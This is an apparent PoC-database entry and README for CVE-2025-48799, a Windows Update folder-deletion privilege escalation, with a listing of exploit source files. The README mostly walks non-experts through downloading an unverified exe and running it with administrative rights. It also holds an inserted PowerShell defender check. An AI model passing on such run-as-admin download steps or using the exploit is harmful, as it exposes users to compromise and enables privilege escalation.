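PoC details: 411d3998e603d64451a4f81b19803b58975a17ea

Source
Related vulnerability
Title: Microsoft Windows Update link following vulnerability (CVE-2025-48799)
Description: Microsoft Windows Update is a software update service from Microsoft (USA). Microsoft Windows Update contains a link following vulnerability. An attacker can exploit it to elevate privileges. The following products and versions are affected: Windows 10 Version 1809 for 32-bit Systems, Windows 10 Version 1809 for x64-based Systems, Windows 10 Version 21H2 for 32-bit Systems, Windows 10
Description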
🛡️ Demonstrate CVE-2025-48799, a Windows Update service vulnerability that allows elevation of privilege via arbitrary folder deletion on multi-drive systems.
Introduction
# 🚀 CVE-2025-48799 - Explore a Simple Proof of Concept

## 📥 Download

[![Download CVE-2025-48799](https://img.shields.io/badge/Download-CVE--2025--48799-brightgreen)](https://github.com/ukisshinaah/CVE-2025-48799/releases)

## 📝 Description

This is a Proof of Concept (PoC) for CVE-2025-48799, which is a vulnerability related to Windows Update. It can allow an attacker to gain higher privileges on affected systems. This vulnerability impacts Windows 10 and Windows 11 clients that have at least two hard drives. 

When multiple hard drives are present, users can change the location for new content to be saved using the Storage Sense feature. If a secondary drive is selected, during the installation of new applications, the Windows Update service (wuauserv) may delete folders arbitrarily without proper checks. This flaw can lead to a local privilege escalation (LPE).

For background on how arbitrary file and folder deletes are abused to escalate privilege, see the ZDI blog post [here](https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks).

## 🚀 Getting Started

This section will guide you through the steps to download and run the application. You don’t need any programming skills.

### Step 1: Visit the Download Page

To download the application, click the link below:

[Download CVE-2025-48799](https://github.com/ukisshinaah/CVE-2025-48799/releases)

### Step 2: Choose the Latest Release

You will arrive at the Releases page. Here, you will see different versions of the software. Look for the latest version at the top of the list. It will generally have the highest version number. 

### Step 3: Download the File

Once you’ve found the latest version, look for the downloadable files associated with it. Click on the file name to start the download. Make sure the file is compatible with your operating system.

### Step 4: Locate the Downloaded File

After the download is complete, go to your computer’s Downloads folder. Locate the file you just downloaded. It will usually have a name like `CVE-2025-48799.exe`.

### Step 5: Run the Application

Double-click on the downloaded file to start the application. If prompted by your computer’s security settings, you may need to confirm that you want to run the file. Follow any additional on-screen instructions.

## ⚙️ System Requirements

- Windows 10 or Windows 11
- At least 2 hard drives must be installed
- Administrative access to run the application

## 🔍 How It Works

The PoC demonstrates how the vulnerability allows for arbitrary folder deletions during the update process. By changing the storage location for new applications, the service (wuauserv) fails to check properly for symbolic links, leading to potential exploitation.
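
A defender-side exposure check for the conditions described above, added here as an example (it is not code from this repository). It lists fixed drives other than the system drive and reports directory reparse points (junctions and symbolic links) found on them; the function names and the scan depth of 2 are assumptions made for illustration.

```powershell
# Added example: triage for the multi-drive precondition and for
# directory reparse points on secondary drives. Function names are hypothetical.

function Get-SecondaryFixedDrive {
    # DriveType 3 = local fixed disk. The system drive is excluded because
    # the README describes the issue for content redirected to another drive.
    Get-CimInstance -ClassName Win32_LogicalDisk -Filter 'DriveType = 3' |
        Where-Object { $_.DeviceID -ne $env:SystemDrive } |
        Select-Object -ExpandProperty DeviceID
}

function Find-DirectoryReparsePoint {
    param(
        [Parameter(Mandatory)] [string] $Root,
        [int] $Depth = 2   # assumption: a shallow scan is enough for triage
    )
    $scan = @{
        LiteralPath = $Root
        Force       = $true                        # include hidden/system items
        Recurse     = $true
        Depth       = $Depth
        Attributes  = 'Directory+ReparsePoint'     # junctions and directory symlinks
        ErrorAction = 'SilentlyContinue'           # skip folders we cannot read
    }
    Get-ChildItem @scan | ForEach-Object {
        $acl = Get-Acl -LiteralPath $_.FullName -ErrorAction SilentlyContinue
        [pscustomobject]@{
            Path       = $_.FullName
            LinkType   = $_.LinkType               # Junction or SymbolicLink
            Target     = $_.Target -join ';'
            CreatedUtc = $_.CreationTimeUtc
            Owner      = $acl.Owner                # who created the link
        }
    }
}

$secondary = @(Get-SecondaryFixedDrive)
if ($secondary.Count -eq 0) {
    'Only one fixed drive found: the multi-drive precondition is not met.'
} else {
    foreach ($drive in $secondary) {
        Find-DirectoryReparsePoint -Root "$drive\" | Format-Table -AutoSize
    }
}
```

A junction on a secondary drive that is owned by a standard user and points into a protected location is worth reviewing, along with confirming that the Windows Update fix for CVE-2025-48799 is installed.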

## 📊 Features

- **Safe Testing Environment**: Use this PoC to understand the implications of the vulnerability in a controlled way.
- **User-Friendly Interface**: The application provides a straightforward setup process.
- **Comprehensive Documentation**: Detailed guides are available within the application and here in the README.

## 💡 Troubleshooting

In case you encounter any issues while running the application:

1. **File Not Found**: Make sure you downloaded the correct file.
2. **Permission Issues**: Ensure you are running the application with administrative rights.
3. **Incompatibility Errors**: Check that your Windows version meets the requirements.

## 📞 Support

If you need further assistance, consider visiting the [GitHub Issues page](https://github.com/ukisshinaah/CVE-2025-48799/issues). Here, you can find solutions to common problems or report any deficiencies.

Feel free to reach out to community members who may have experience with this PoC.

## 🔗 Additional Resources

- [ZDI blog post: Abusing Arbitrary File Deletes to Escalate Privilege and Other Great Tricks](https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks)
- Engage with the community on forums relevant to Windows security vulnerabilities.

[Download CVE-2025-48799](https://github.com/ukisshinaah/CVE-2025-48799/releases) and start your exploration today!
File snapshot

[4.0K] /data/pocs/411d3998e603d64451a4f81b19803b58975a17ea
├── [4.1K] README.md
└── [4.0K] WinUpdateEoP
    ├── [558K] 5eeabb3.rbs
    ├── [4.2K] def.h
    ├── [4.4K] FileOplock.cpp
    ├── [1.0K] FileOplock.h
    ├── [ 16K] FileOrFolderDelete.cpp
    ├── [ 10K] main.cpp
    ├── [184K] Msi_EoP.msi
    ├── [ 440] resource.aps
    ├── [ 300] resource.h
    ├── [2.1K] resource.rc
    ├── [1.4K] WinUpdateEoP.sln
    ├── [6.8K] WinUpdateEoP.vcxproj
    ├── [1.6K] WinUpdateEoP.vcxproj.filters
    └── [ 168] WinUpdateEoP.vcxproj.user

1 directory, 15 files